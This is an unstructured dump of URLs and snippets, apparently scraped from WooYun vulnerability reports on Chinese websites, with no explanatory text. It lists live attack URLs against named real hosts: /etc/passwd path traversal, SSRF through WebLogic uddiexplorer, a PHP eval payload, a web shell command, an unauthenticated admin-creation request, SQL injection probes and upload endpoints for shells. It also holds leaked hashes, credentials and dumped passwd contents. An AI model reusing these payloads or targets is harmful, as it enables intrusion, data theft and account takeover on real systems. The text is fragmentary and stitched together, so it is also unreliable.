http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 www.chuanxindai.com http://bbs.55bbs.com/space-viewpro-uid-1.html http://bbs.55bbs.com/space-viewpro-uid-3.html http://50.18.199.171/wauthen/login http://**.**.**.**/article/detail?conCatID=416&contentID=11191 http://**.**.**.**/article/detail?conCatID=416&contentID=11191 http://**.**.**.**/news.aspx?cid=2015010001&pid=2015110013 http://**.**.**.**/s/1jG4gQvs http://**.**.**.**/hr/job.aspx http://123.232.100 system:type=ServerInfo http://123.232.100 system:type=ServerInfo http://biosafety.sysu.edu.cn http://biosafety.sysu.edu.cn http://**.**.**.**/zscq/ http://**.**.**.**/cms/index.php?r=mobile/ret&id=51674&type=article&uid=0&terminusType=2&version=2.8.7 http://app.cmiea.org http://**.**.**.**/sps/loginaction!logout.action http://**.**.**.**/sps/abSqdAction!newSqd.action?idAbSqd=255394 http://**.**.**.**/sps/getSqdclListAction!clList.action?sqdid=255395 http://www.flyertrip.com/hotels/book.php下单,随便填信息 http://106.39.17.117:8080 http://amail.swufe.edu.cn:8081/ cn:8081 http://**.**.**.**/product/detail.aspx?id=10 http://**.**.**.**/product/detail.aspx?id=10 http://votegd.gridinn.com/phpmyadmin http://116.236.239.109 http://www.sinochemjiangsu.com/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://www.sinochemjiangsu.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://**.**.**.**/index.php?option=com_content&view=article&id=110&Itemid=244&lang=zh http://**.**.**.**/index.php?option=com_content&view=article&id=110&Itemid=244&lang=zh ba22ceecc64b376a4b8d75adf9574dda:V0fo9dq1xFF9YK7cWklcZ0JDVqG2NAU3 b58afb98bb94616a5e0b3ed2f2731fea:f4fpq4JZhZXdK8jYSoIHSp52rw1j69k0 aeb6e0c06c65025bdbe0d4281bc741e5:XTkxCfPrXz33tcNhOjl07ArazpnWqYFj http://**.**.**.**/run/index.php?num=541 http://**.**.**.**/news_show.asp?nid=336 http://**.**.**.**/news_show.asp?nid=336 http://cme.gxwskjw.91huayi.com/report/publicedPassedSummary.aspx?displayMode=1&frontForUnit=1&holdYear=11&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101 http://**.**.**.**/bugs/wooyun-2015-0145598 http://221.226.125.200/uddiexplorer/SearchPrivateRegistries.jsp http://221.226.125.211:8001/uddiexplorer/SearchPublicRegistries.jsp http://221.226.125.220:8001/uddiexplorer/SearchPublicRegistries.jsp http://221.226.125.201///uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.219:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://221.226.125.201///uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.219:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://wm1.mail.cntv.cn/uddiexplorer/SearchPrivateRegistries.jsp http://wm2.mail.cntv.cn/uddiexplorer/SearchPrivateRegistries.jsp http://wm4.mail.cntv.cn/uddiexplorer/SearchPrivateRegistries.jsp http://wm2.mail.cntv.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.165.145:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://wm2.mail.cntv.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.165.145:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search https://g.jiuminghu.com/#newwindow=1&q=intitle:%E3%80%8A%E7%94%A8%E5%8F%8BU8-OA%E3%80%8B&btnK=+%E6%90%9C%E7%B4%A2 http://122.227.235.74:4389/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://www.lygdfyy.com.cn:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://222.175.187.147:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://222.189.156.67:8089/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://www.hxgroup.co:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://mail.228.com.cn/ http://gywsw.91huayi.com/Page/PageL3.aspx?lm=1 http://58.32.246.78:8380/ http://pet.sina.com.cn http://poke.petkoo.com/Member/Register.shtml http://om.wxmovie.com/ http://ad.wxmovie.com/test1.php http://**.**.**.**/vip//index.php?cate_id=67 http://**.**.**.**/plus/mytag_js.php?aid=1 inurl:Article_Print.asp http://**.**.**.**/10lada/Article_Print.asp?ArticleID=7820 http://**.**.**.**/more.php?TYPE=news&PAGE=7 http://**.**.**.**/more.php?TYPE=news&PAGE=7 http://**.**.**.**/affiche_show.aspx?strAfficheId=273 http://**.**.**.**/affiche_show.aspx?strAfficheId=273 http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey= http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey= http://106.2.161.16:8080/ http://redmine.xamama.com.cn:81/ http://**.**.**.**/loginOA.aspx TeamViewer:656464137 https://**.**.**.**/gangjian/work/blob/dfd1696a5250b42d393cacfafe06d4f30767b1b5/ServiceAreaClient/Docs/%E5%A4%96%E7%BD%91URL.txt http://**.**.**.**/bugs/wooyun-2015-0145758 http://**.**.**.**/***_detail.php?nid=761 http://**.**.**.**/trademark.php?id=43 http://**.**.**.**/trademark.php?id=43 http://**.**.**.** http://**.**.**.**/login.aspx http://**.**.**.**/ http://www.mazda.com.cn/ http://www.mazda.com.cn/admin.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**//aea/Download?strName=1.txt&strPath=../../../../../../../../../../etc/passwd http://219.143.252.170/seeyon//logs/login.log http://219.143.252.170/seeyon/ http://221.8.57.99/ http://**.**.**.**:7001/cbdcpt/login.jsp http://**.**.**.**:7001/DaTa/cmd.jsp http://baike.120ask.com/ http://baike.120ask.com http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2 http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2 http://**.**.**.**/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=01 http://**.**.**.**/hbwz/qtpage/hdjl/zxzx_info.jsp?id=20151005190032 URL:http://b2cmob.baoxian.com/b2cmobServer/mobileFunctionShowNum.do?userId=8a82839450ff28e30151095c30bb2f85 http://**.**.**.**/web/web/web2/show_new.asp?bh=488 http://wap.hihoku.com http://**.**.**.**/ http://www.zdtdb.com/news_view.asp?id=3289&classid=2 http://cigna.sysu.edu.cn/enMain/news/contact.aspx?no=101&pId=65 http://**.**.**.**/xzsme/index.jsp http://**.**.**.**/mall/g7qukhTRCcNB4.html http://**.**.**.**/gceAccount.php?action=20 width:100%;overflow:scroll;display:none http://103.235.46.165 http://103.235.46.165/index.php/Manage/login post:username=test&password=test http://103.235.46.165/index.php/Manage/login post:username=test'&password=test http://jxxyzc.91huayi.com http://info.cqvip.com http://**.**.**.**/usermanager/userexistscheck.aspx http://www.fanhua.net.cn/2xwdt_1jtxw_xx.aspx?nid=16774 http://**.**.**.**/bugs/wooyun-2015-0123238 http://**.**.**.**/systemplateweb/IndexHeade.aspx?Series=1&XXDM=440307000003 http://**.**.**.**/systemplateweb/IndexHeade.aspx?Series=1&XXDM=440307000003 http://**.**.**.**/demo/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/sysTemplateWeb/IndexHeade.aspx?XXDM=440304123456&Series=lib http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.oneplus.cn/ http://www.1218.com.cn/index.php/product?id=23 http://**.**.**/article.phpid=433&c=46,47 http://**.**.**.**/Home/default.asp http://**.**.**.**:7001/CRM/ http://**.**.**.**:7001/CRM/user/loginIntoSys.do http://**.**.**.**:7001/CRM/one.jsp http://**.**.**.**:7001/CRM/wooyun.jsp http://**.**.**.**/nano/V2007/profiles.asp?sno=33 http://**.**.**.**/ http://**.**.**.**:80/ http://121.43.74.72/yaie http://121.43.74.72/yaie/operinfo_userLogin.do http://school.dev.gaofen.com/index.php?action=college_majordata&college_id=10315&mod=college_api&num=100&provid=27&wl=1&year=2014 http://www.super8.com.cn/ http://**.**.**.**/contact.aspx?sortId=30 http://**.**.**.**/show.aspx?cid=1150&sortId=58 http://live.acfun.tv http://**.**.**.**/newsPage.php?nsId=161 http://**.**.**.** http://pop.by-health.com/index.php?retid=594056532fc265c38&unautologin=1 http://partner.funshion.com/index.php http://111.205.151.151/seeyon//logs/login.log http://111.205.151.151/seeyon/ http://www.tcldisplay.com/cn/home/index.html http://eemd.phys.ruc.edu.cn/LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111 http://asc.ruc.edu.cn http://nxzy.hnagroup.com/userAct/selectQueryUserActs.action?destination=11 http://58.246.61.238/seeyon/ http://**.**.**.**/bugs/wooyun-2015-0150182/trace/b9c08621a39ece1ee9eaaba3268ff5a5 http://**.**.**.**/opd/service-e.aspx?id=0205&Page=11& http://**.**.**.**/BCrg/opd/service-e.aspx?id=1000&Page=11& http://**.**.**.**/opd/service-e.aspx?id=1100&Page=11& http://**.**.**.**/TCRG/opd/service-e.aspx?id=0208&Page=11& http://**.**.**.**/opd/opd/service-e.aspx?id=0300&Page=11& http://**.**.**.**/opd/service-e.aspx?id=0122&Page=11& http://**.**.**.**/ymrg/opd/service-e.aspx?id=0400&Page=11& http://**.**.**.**/opd/service-e.aspx?id=1100&Page=11& http://**.**.**.**/opd/service-e.aspx?id=0120&Page=11& http://**.**.**.**/YMRG/opd/service-e.aspx?id=3301&Page=11& http://oa.funshion.com/seeyon//logs/ctp.log http://oa.funshion.com/seeyon/ http://**.**.**.**/price_nav.php?id=44 http://**.**.**.** http://www.96wan.com/websiteapi/website_serverlist?gid=6 http://a.120ask.com/login?from=aHR0cDovL3d3dy4xMjBhc2suY29tLw== http://**.**.**.**/Informationservice_new/right/loginExcute.jsp?pmail=admin&pcode=123456 http://www.ccoop.com.cn/index.html cn:3306/monitor_***** postgresql://h155.mzhen***** jdbc:postgresql://114.112.8***** postgresql://114.112.89***** dbc:postgresql://h1***** cn:3306/monitor_***** jdbc:postgresql://1***** api.mzhen.cn/monitor/v1/target/show_ http://access.miaozhen.com http://admonitor.miaozhen.com http://tvmonitor.miaozhen.com cn:9527/tv_rerun/_ http://**.**.**.**/plus/teacher.php?id=85 http://**.**.**.**/plus/teacher.php?id=85 http://**.**.**.**/brands.php?id=9 URL:http://g.qq.com/admin http://127.0.0.1/1.js URL:http://bbs.g.qq.com/forum/queryPageCommentInfo?forum_id=1&page_no=1&page_size=10&topic_id=帖子ID&author_id=0&rank_way=5 http://bbs.g.qq.com/forum/queryPageCommentInfo?forum_id=1&page_no=1&page_size=10&topic_id=3025002759233984&author_id=0&rank_way=5 http://sde.sdu.edu.cn http://sde.sdu.edu.cn/FCKeditor/editor/filemanager/connectors/uploadtest.html http://spxy.swu.edu.cn/show/show.php?id=2926 http://**.**.**.**/?page_id=3572 http://**.**.**.**/?page_id=3572 http://60.28.104.133:9060/yyoa/assess/js/initDataAssess.jsp http://60.28.104.133:9060/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://60.28.104.133:9060/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://**.**.**.**/Textile/io_er/asp_ch/exporter_b.asp?theAction=getDetail&sCatg=391&cty=ALL&ctyNam http://**.**.**.**/Textile/io_er/asp_ch/exporter_b.asp?theAction=getDetail&sCatg=391&cty=ALL&ctyNam http://**.**.**.**/show.aspx?ID=2015101609225000015 http://**.**.**.**/Rsc2/jobs/job.php?id=420 http://**.**.**.**/admin/login.php http://**.**.**.**:8088/admin/login.php http://**.**.**.**/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**/admin/login.php http://**.**.**.**/admin/login.php http://**.**.**.**:8080/admin/login.php http://**.**.**.**/bugs/wooyun-2014-085980 http://www.changan-mazda.com.cn/index.php/admin/Auth http://m.jiashuangkuaizi.com height:20px;BORDER http://**.**.**.**/login.aspx http://**.**.**.**/news-x.php?tid=174&id=879 http://**.**.**.**/database/search/ejournal/JournalList_user.asp http://**.**.**.**/database/search/ejournal/JournalList_user.asp http://**.**.**.**/hk/zh-hk/vertical-markets-industry1-casestudy.php?idpk=7§ion=4 http://**.**.**.**/ http://**.**.**.**/zhtj_webservice_rs/DataUpdateServer.asmx?WSDL http://**.**.**.**/zhtj_webservice_rs/LoginService.asmx?WSDL http://**.**.**.**/zhtj_webservice_rs/DataUpdateServer.asmx http://**.**.**.**/DataUpdate soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/ xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://**.**.**.**/zhtj_webservice_rs/DataUpdateServer.asmx http://**.**.**.**/DataUpdate2 soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/ xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://**.**.**.**/zhtj_webservice_rs/DataUpdateServer.asmx http://**.**.**.**/PKExchange soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/ xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://demo.haidao.la/uploadfile/avatar/391_50.jpg/1.php?cmd=echo%20__FILE__ http://www.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://www.flyertrip.com/hotels/personalCenter/myOrderAll.php?id=2 http://**.**.**.**/souvenir_detail.php?id=1 http://**.**.**.**/souvenir_detail.php?id=1 http://**.**.**.**/SsResult.aspx?wd=2015 http://**.**.**.**/NewsPage.aspx?fid=6450 http://**.**.**.**/login/ssoLogin_login2.action http://**.**.**.**/shopsmart/index.php/Shopping/viewReport?module=1&first_cate_id=20400&product_id=32&attribute_id=3&report_id=88 http://**.**.**.**/shopsmart/index.php/Shopping/viewReport?module=1&first_cate_id=20400&product_id=32&attribute_id=3&report_id=88 http://**.**.**.**/shopsmart/index.php/Shopping/viewReport?module=1&first_cate_id=20400&product_id=32&attribute_id=3&report_id=88 http://**.**.**.**/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://**.**.**.**:6789/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**:6789/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**:6789/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://**.**.**.**:6789/yyoa/createMysql.jsp http://www.changan-mazda.com.cn//market/2015axelaanniversary/index/info/11/%5c http://www.changan-mazda.com.cn:80//excellenceplan/position?keyword=&type=%5c http://**.**.**.**/SchoolInfo/getBaseInfo?&version=2.7.3&ossdk=19&xxzh=50135841&os=an&ipaddress=**.**.**.**&osversion=4.4.4&appversion= http://**.**.**.**/SchoolInfo/getBaseInfo?&version=2.7.3&ossdk=19&xxzh=51114705&os=an&ipaddress=**.**.**.**&osversion=4.4.4&appversion= http://**.**.**.**/SchoolInfo/getBaseInfo?&version=2.7.3&ossdk=19&xxzh=51396819&os=an&ipaddress=**.**.**.**&osversion=4.4.4&appversion= http://**.**.**.**/?section=Promotion&id=123 http://**.**.**.**/?section=Promotion&id=123 http://**.**.**.**/products.php http://**.**.**.**/products.php http://**.**.**.**/sc_webcat/ecat/product_view.php?lang=3&id=526 http://**.**.**.**/sc_webcat/ecat/product_view.php?lang=3&id=526 https://219.141.242.12 http://10.100.1.83:7001/teamserver/faces/home.jsp http://121.193.130.234:8087/lesson.php?lesson=S207E111&college_id=207 http://121.193.130.234:8087/test.php http://121.193.130.234:8080 http://121.193.130.234:8087/lesson.php?lesson=S207E111&college_id=207 http://121.193.130.234:8087 http://**.**.**.**/**.**.**.**.rar career-whrc.huawei.com/pages/handle/register.handle.php http://**.**.**.**/newfangshou.php?id=44 http://**.**.**.** http://tj.ujn.edu.cn http://tj.ujn.edu.cn http://***********/index.php/news/views/id/425 http://**.**.**.**/about.php?aid=9 http://**.**.**.**/about.php?aid=9 http://wooyun.org/bugs/wooyun-2015-0116152 http://chudan.ehuatai.com/ index.php/Index/index/ http://**.**.**.**/user/zpzz/addZpzz.action http://szjyzx.cnu.edu.cn http://xbgf.nwpu.edu.cn:80/ F956C96A974341E1ADEE6111EF968CDF:FG=1 http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/kwgonggao.jsp?subtype=8 http://**.**.**.**//Isv.ashx?action=addadmin&adminuser=admin1&adminpassword=111111&guid=2 http://track.haolyy.com/app.zip FCKeditor:BasePath FCKeditor:UserFilesPath FCKeditor:AttachDirectory http://image.izacholsm.com/fkImages/"/ http://localhost http://www.greentomail.com/eid=55 http://image.izacholsm.com/t/zz?t="/ http://image.izacholsm.com/t/"/ http://dec.jlu.edu.cn http://dec.jlu.edu.cn http://yanchuan.cn/company/index.html http://115.28.114.124/api/v1/contact/list http://**.**.**.** http://101.198.156.228/phpmyadmin/ http://**.**.**.**:99/ http://**.**.**.**:99//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://search.lenovo.com/search?isort=score&lbc=lenovo&p=KK&pw=Thinkpad%20X1%20Carbon%203rd%20Generation&rk=5&srid=S12-USWSD03&ts=custom&uid=72429456&view=grid&w=X1%20Carbon http://erp.csztv.cn/member http://api.honglingjin.cn/westore/mall/position http://61.142.112.67/barcode/Signout.service http://user.91160.com/find/forget.html http://euro2012.touzhu.cn/experts_list/2'/1存在sql注入漏洞 http://**.**.**.**/icarttw/help/shoppingCartAllRowzbin.action?yhid=5672680&_=1448764540382 http://**.**.**.**/ http://bi.mioji.com http://**.**.**.** http://oa.guokinghk.com:8080/yyoa/assess/js/initDataAssess.jsp http://oa.guokinghk.com:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://oa.guokinghk.com:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://218.61.139.232:8080/ http://218.61.139.232:8080/console/login/LoginForm.jsp http://**.**.**.**/jy/admin?c=login http://**.**.**.**/zs/admin http://**.**.**.**/server-status http://**.**.**.**//jy/include/class/c_account.php http://**.**.**.**/jy/include/ http://**.**.**.**/phpmyadmin/main.php http://**.**.**.**/jy/include/js/kindeditor/ http://**.**.**.**/jy/include/js/kindeditor/php/demo.php这个地方可以POST一个反射型XSS出来,不过这样打出的xss貌似是鸡肋。。提交的POST数据: https://202.108.103.153 https://oa.ehuatai.com http://mail.ehuatai.com/ http://www.pig.ai http://www.pig.ai/aboutus http://www.ruifilm.cn/index.php/module/action/param1/${@eval%28$_POST[c]%29 http://**.**.**.**/kzjj/login.asp http://**.**.**.**:7001/cbdcpt/login.jsp http://**.**.**.**:7001/ewebeditor/admin/default.jsp http://**.**.**.**/dlarea/dl_model.php?bid=165&bname=%E7%B4%A2%E5%B0%BC%E7%88%B1%E7%AB%8B%E4%BF%A1&mid=4070*&mname=W810&from= http://**.**.**.**/dlarea/dl_model.php?bid=128&bname=%E9%95%BF%E8%99%B9&mid=1835*&mname=008-IIIM&from=qs http://**.**.**.**/iftbt/BT1R21C.php?f_bdno=103061001H0092 http://**.**.**.**/ip/index.php http://www.flyertrip.com/hotels/personalCenter/mydata.php?flag=update&email=test111@test.com&nickname=test111@test.com,参数应该看的懂吧,然后登陆test222账号去访问这个链接之后,test222的资料就会被更改如图 http://121.43.74.31/drm/index.htm http://www.tianhong.cn/order/my_address!edit.html?addressId=50232460 http://www.bjpost.com.cn http://115.239.210.62:8080 c3.cofco.com/data/test.php c3.cofco.com/data/file.php c3.cofco.com/config/test.php第一个构造出路径 http://c3.cofco.com/config/file.php http://219.141.242.62/huataiwechart/index_neu.jsp http://219.141.242.62/huataiwechart/tmp/checkcodeClaim http://219.141.242.62/huataiwechart/tmp/checkcodeClaim http://oa.gtadata.com/C6/Jhsoft.Web.login/PassWordNew.aspx http://oa.gtadata.com/C6/Jhsoft.Web.login/NewView.aspx?id=1 http://oa.gtadata.com/C6/Jhsoft.mobileapp/login/login.html http://www.infzm.com/mobile/get_news_by_datetime?platform=android&hash=f2b0770cfdf697748154b963e4d9a092&cat_id[]=2870&limit=20&direct=newer&datetime=2015-11-28%2023:45 http://**.**.**.**:85/search.aspx http://**.**.**.**/gjjcx/search.aspx http://**.**.**.**/gjjcx/ http://**.**.**.**:8002/ http://**.**.**.**/个人查询处存在sql注入,在提交单位号时进行构造,则可进行报错注入,当前库为bzgjj http://design.cetools.cn/02.rar http://111.13.108.103/index.php/login http://www.oppo.com/my/r7-plus-preorder/findStore.php?location=-1 http://wel.xmu.edu.cn/ch/research/mid/5/catid/47 http://wel.xmu.edu.cn/ch/research/mid/5/catid/47%20and%201=1 http://**.**.edu.cn/ch/research/mid/5/catid/47%20and%201=2 http://wel.xmu.edu.cn/ch/research/mid/5/catid/48 http://wel.xmu.edu.cn/ch/nlist/mid/5/catid/53/ http://wel.xmu.edu.cn/ch/scientific/mid/5/catid/23 http://**.**.**.**/product_fl.asp?sid=120 http://**.**.**.**/c6/Jhsoft.Web.login/PassWordNew.aspx http://**.**.**.**/c6/Jhsoft.Web.login/NewView.aspx?ID=1 https://github.com/Rex---/hscloud-3.0.x/blob/aec6d117b36110ad0346929d66d79041b301cd66/mail/src/test/resources/mail.properties www.xrnet.cn http://192.168.5.69:8080/web-1.1-SNAPSHOT http://localhost:8080/webSite http://www.haidao.la/index.php?m=Member&c=Public&a=repwd http://**.**.**.**:8088/SKLSUG/indexlis.jsp http://42.96.249.54/ http://**.**.**.**/test/ https://github.com/Rex---/hscloud-3.0.x/blob/aec6d117b36110ad0346929d66d79041b301cd66/mail/src/test/resources/mail.properties api.jucaicat.com/jcc818/BankCardList http://mobile.ztgame.com/mobile/index.php http://mobile.ztgame.com/m_login.php http://219.143.69.58:80/login.php http://219.143.69.58:80/ http://video.hkcts.com/mysql/ http://video.hkcts.com/mysql/cts.tar.gz http://video.hkcts.com/install/index.php http://video.hkcts.com/adminsoft/index.php http://www.yuncars.cn/appSpread/ http://mbu.baidu.com http://www.zhuaqianmao.com/about.html http://www.xiaojinniu.com/download_app?f=kp http://labsafe.ruc.edu.cn/index.php?a=examtraining&c=index&id=1&m=member&type=TF http://house.mama.cn http://api.yijifen.com/EScore_API/common/comfirmActivateCheckGet.do?appid=1056497222&deviceid=&IDFA=D900C5E4-7934-4161-BE20-7C97F66BFD41&actiontime=1448616690731 http://wiki.gw500.com/xmlrpc bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** ews:/et***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** aemon:/:/s***** owner:/d***** user:/:/***** Server:/var/l***** OProfile:/***** ver:/var/lib***** arpwatch:/***** ntp:/sbi***** bus:/:/***** daemon:/:***** named:/***** SSH:/var/empty***** User:/var/lib***** User:/var/li***** daemon:/:/***** pd:/var/lib/avahi-***** er:/etc/X11/***** gdm:/sbi***** www:/***** tomcat6:/***** Checker:/var/c***** uite:/var/run/qu***** tcache:/:/s***** ftp://mrtg.gw500.com/ http://**.**.**.**/catalog/product_info.php?products_id=5&language=tc&osCsid=8a474fc2318cbdd1bf82cfc28e45f8b6 http://**.**.**.**/catalog/product_info.php?products_id=5&language=tc&osCsid=8a474fc2318cbdd1bf82cfc28e45f8b6 http://**.**.**.**/HealthCare/MemberAppointmentFAction@forwardToFeature.action http://**.**.**.**/HealthCare/MemberAppointmentFAction@forwardToFeature.action http://**.**.**.**/test.txt http://votegd.gridinn.com/utility/convert/index.php http://218.58.70.201 http://**.**.**.** http://**.**.**.**:8383 http://**.**.**.**:8383/ewebeditor/jsp/upload.jsp?action=save&type=image&style=mini&cusdir=&skey= width:100% http://**.**.**.**:8383/ewebeditor/uploadfile/20151130154318893.jsp http://**.**.**.**/login.aspx http://**.**.**.**/login.aspx http://123.234.41.10:88/TISS/ http://bbs.96wan.com/.svn/entries code:sqlmap.py http://resume.shenzhenair.com/one8.jsp http://resume.shenzhenair.com/wpp.jsp www.zrbao.com https://**.**.**.**/duffiye/duffiye/blob/8cc21a1446ae05f5f83cb5bcf8befa75e8766621/duffiye-admin/src/main/resources/project.properties http://**.**.**.**/wpage/content.jsp?id=2947 index.php/account/ajax_useremail http://cps.huatu.com http://hd.rog.xoyo.com/Controller_Basesys_Person/addPerson http://test.99.com/ http://test.99.com/reportHome?inner=1 http://test.99.com/registeruser/CookInsert?userAccount=你的用户名&inner=1 http://test.99.com/registeruser/CookInsert?userAccount=admin&inner=1 http://**.**.**.**/user/loginUI.action http://**.**.**.**/goods.php?cat_id=33 jdbc:oracle:thin:@**.**.**.**:1521:hcr http://220.181.8.205:8081//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://sbs.m.sogou.com/phpmyadmin/setup/index.php https://github.com/wangrui-spiderNet/HnProject/blob/8f28e44933def827c4b0cfb7d9b34e888451d470/WorkLife/src/com/hna/lmail/ui/activities/SplashActivity.java https://anyoffice.hnagroup.com/-custom/any-office1.html http://**.**.**.**/res/active/4G/upload.jsp http://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload.jsp http://**.**.**.** https://github.com/xiebin2015/autotest/blob/bd277279bfaf2b739409e517407a25f07d767e86/pay-autotest-web/src/main/resources/mail.properties http://**.**.**.**/yhlnew/NewInfos.aspx?id=3082 http://**.**.**.**/yhlnew/NewInfos.aspx?id=3082 https://github.com/understand1006/JDiPad_jenkins https://github.com/xushao0305/toolbox https://github.com/xushao0305/toolbox/tree/5f95623da179161b75eb37f22f8e3db9bddf622a/analyze http://**.**.**.**/MarketInfo/Search/marketInfoListPb.aspx?iURLFlag=4&marketInfoSort=6 http://**.**.**.** http://**.**.**.**/user/login http://snsvote.hupu.com/ShowInner.php?voteid=275590&showtype=bbs_cut&uid=151585 http://**.**.**.**/editor/tiny_mce/plugins/uploda.php,可上传一句话木马,目录传到plugins目录下,使用的是ewebeditor http://**.**.**.**/public/login.aspx http://**.**.**.**/public/login.aspx http://os.wasu.cn/phone/phone.php?id=1 http://os.wasu.cn/phone/editphone.php?phone=1 http://ad.ijinshan.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.reagent.com.cn:666/Vip/bg/adminlogin.jsp http://www.reagent.com.cn:666/Vip/login.jsp http://**.**.**.**/ http://**.**.**.**/C6/Jhsoft.mobileapp/login/login.html index.php/Gongyong/sblist/id/11.html http://wechat.rongmomo.cc http://wireless.xiaozhu.com/app/xzfk/android/220/order/list?length=10&_=1447840135385&sessId=*********************&bizState=ongoing&offset=0&dispathChannel=xiaozhu&userId=*********** http://**.**.**.**/news_daily.php?id=523 http://**.**.**.**/news_daily.php?id=523 http://**.**.**.**/Search/Search.asp http://**.**.**.**/Search/Search.asp http://sf-ocs.sf-express.com:8080/live800/downlog.jsp?path=/&fileName=/etc/passwd http://wbgh.youxinpai.com http://oa.99114.com/ http://live800.wan.renren.com//live800/downlog.jsp?path=/&fileName=/etc/passwd http://**.**.**.**/?p=employee&store=513&employee_id=240 http://**.**.**.**/?p=employee&store=513&employee_id=240 http://online.cmfchina.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://wooyun.org/bugs/wooyun-2015-0137238 http://crm.emar.com/ http://crm.emar.com/ajax/uploadfile.php?DontCheckLogin=1 http://crm.emar.com/tmpfile/upd_1VOJBb.txt http://**.**.**.**/admin/login.do?activity=logout&empid=-1 http://**.**.**.**:88/login/Login.jsp?logintype=1 